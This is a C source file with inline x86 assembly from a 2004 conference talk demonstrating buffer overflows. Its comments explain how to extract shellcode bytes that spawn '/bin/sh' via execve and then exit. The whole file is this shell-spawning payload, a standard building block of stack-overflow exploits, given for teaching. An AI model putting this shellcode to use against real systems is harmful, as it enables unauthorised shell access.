/*
 * Demonstrating Buffer Overflows
 *
 * Examples presented at the Grazer Linuxtage 2004
 *
 * Copyright (C) 2004 Thomas Winkler <tom@qwws.net>
 * Copyright (C) 2004 Markus Quaritsch <quam@qwws.net>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 */


/* 
 * This code is intended to get the bytecode for the assembler-instructions
 * listed below (spawning a shell and exit afterwards). Compile it and use a
 * debugger (e.g. gdb) to disassemble an extract the bytecode.
 *
 * It is not possible to execute this program because it modifies itself 
 * (writing 0x0 after the string '/bin/sh' which is not allowed in the 
 * text-segment.
 *
 * To find out the address offsets for the 'jmp' and 'call' instruction use an
 * debugger (e.g. gdb)
 */

int main() {
 __asm__(
"	jmp .+0x2c				\n"
"	popl %esi				\n"
"	movl %esi, 0x8(%esi)	\n"
"	movb $0x0, 0x7(%esi)	\n"
"	movl $0x0, 0xc(%esi)	\n"
"	movl $0xb, %eax			\n"
"	movl %esi, %ebx			\n"
"	leal 0x8(%esi), %ecx	\n"
"	leal 0xc(%esi), %edx	\n"
"	int $0x80				\n"
"	movl $0x1, %eax			\n"
"	movl $0x0, %ebx			\n"
"	int $0x80				\n"
"	call .-0x2a				\n"
"	.string \"/bin/sh\"		\n"
);
	
}
